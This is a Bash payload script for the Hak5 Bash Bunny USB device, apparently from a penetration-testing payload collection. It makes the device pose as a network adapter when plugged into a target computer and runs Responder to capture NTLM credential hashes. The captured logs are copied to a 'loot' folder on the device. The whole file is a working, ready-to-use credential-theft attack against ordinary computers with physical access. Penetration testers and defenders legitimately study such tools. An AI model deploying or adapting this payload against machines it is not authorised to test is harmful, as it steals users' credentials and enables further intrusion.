#!/bin/bash
#
# Title:         Quick Creds
# Author:        Hak5Darren -- Cred: Mubix
# Version:       1.0
#
# Runs responder against target with specified options
# Saves sequential logs to mass storage loot folder
#
# Requires responder in /pentest/responder - run tools_installer payload first
#
# White Blinking.....Dependencies not met. Responder not installed in /pentest
# Red ...............Setup
# Red Blinking.......Setup Failed. Target did not obtain IP address. Exit.
# Amber Blinking.....Scanning
# Green..............Finished
# 
# Options
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/udisk/loot/quickcreds

# Check for responder. If not found, blink WHITE and end.
if [ ! -d /pentest/responder/ ]; then
  LED R G B 100
  exit 1
fi

# Set LED Red while setting up attack
LED R

# Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET
ATTACKMODE RNDIS_ETHERNET 
#ATTACKMODE ECM_ETHERNET

# Source bunny_helpers.sh for functions & variables TARGET_IP, TARGET_HOSTNAME
source bunny_helpers.sh

# Setup named logs in loot directory
mkdir -p $LOOTDIR
HOST=${TARGET_HOSTNAME}
# If hostname is blank set it to "noname"
[[ -z "$HOST" ]] && HOST="noname"
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
COUNT=$((COUNT+1))
mkdir -p $LOOTDIR/$HOST-$COUNT

# As a backup also copy logs to a loot directory in /root/loot/
mkdir -p /root/loot/quickcreds/$HOST-$COUNT

# Check target IP address. If unset, blink RED and end.
if [ -z "${TARGET_IP}" ]; then
    LED R 100
	exit 1
fi

# Set LED yellow, run attack
LED G R 500
cd /pentest/responder

# Clean logs directory
rm logs/*

# Run Responder with specified options
python Responder.py -I usb0 $RESPONDER_OPTIONS &

# Wait until NTLM log is found
until [ -f logs/*NTLM* ]
do
     # Ima just loop here until NTLM logs are found
	 sleep 1
done

# copy logs to loot directory
cp logs/* /root/loot/quickcreds/$HOST-$COUNT
cp logs/* $LOOTDIR/$HOST-$COUNT

# Sync USB disk filesystem
sync

# Light turns green - trap is clean.
LED G